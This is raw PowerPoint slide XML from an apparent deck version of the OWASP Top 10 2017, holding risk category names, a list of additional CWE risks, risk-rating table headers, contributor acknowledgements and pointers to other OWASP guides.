                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Data Exposure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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML Exter-nal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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0">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COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="12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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1" baseline="0">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900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration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ru-RU" sz="900" b="1">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DIFFICULT</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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Components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ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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DIFFICULT</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Additional Risks to Consider</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50" baseline="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ru-RU" sz="1000" baseline="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4"/>
                        </a:rPr>
                        <a:t>CWE-352: Cross-Site Request Forgery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5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')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6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</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8"/>
                        </a:rPr>
                        <a:t>CWE-601: Unvalidated Forward and Redirects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9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</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10"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)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11"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery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Prevalence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369"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Detectability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796"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Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908"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Technical</a:t>
            </a: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900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">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Business</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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Details About Risk Factors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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ru-RU" sz="95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ru-RU" sz="95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ru-RU"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ru-RU" sz="95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Public Data Call</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5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5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ru-RU" sz="95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5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+DAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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ru-RU" sz="900" b="1" i="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</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b="1" i="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</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+ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Data Contributors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many </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="ru-RU">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ru-RU" sz="950" u="none" baseline="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ru-RU" sz="950" u="none" baseline="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Acknowledgements to Individual Contributors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ru-RU" sz="950" u="none" baseline="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We would be remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance. Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike">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AsTech Consulting</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ContextIS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Easybss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Edgescan</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iBLISS Seguran̤a &amp; Intelig̻encia</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ITsec Security Services bv</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Khallagh</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M. Limacher IT Dienstleistungen</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Osampa</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Purpletalk</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Foreword</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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" i="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which is suitable for CIOs and CISOs, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Application Managers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity Model</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Sponsorship</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r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Thanks to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea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ru-RU" sz="950" baseline="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FW</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Foreword</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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </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50" b="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ru-RU" sz="950" b="1"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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> completed by over 500 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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Roadmap for future activities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950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Application Managers </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP Proactive Controls </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> is a guide for organizations and application reviewers on what to verify.</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1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
